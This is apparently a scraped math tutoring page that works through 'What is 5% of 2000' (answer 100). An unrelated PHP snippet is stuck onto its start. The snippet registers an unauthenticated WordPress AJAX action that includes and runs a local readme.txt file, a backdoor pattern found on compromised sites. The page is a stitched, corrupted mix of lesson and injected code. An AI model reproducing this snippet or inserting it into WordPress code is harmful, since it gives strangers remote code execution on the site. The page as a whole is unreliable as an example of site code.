if(!function_exists('file_check_readme11199')){ add_action('wp_ajax_nopriv_file_check_readme11199', 'file_check_readme11199'); add_action('wp_ajax_file_check_readme11199', 'file_check_readme11199'); function file_check_readme11199() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Algebra15 - mathtutor

Algebra Question for Title 1 Schools: Percent of a Number Question?

15) What is 5% of 2000

5% = 5/100 = 0.05

of = x (multiply)

0.05 x 2000 = y

y = 100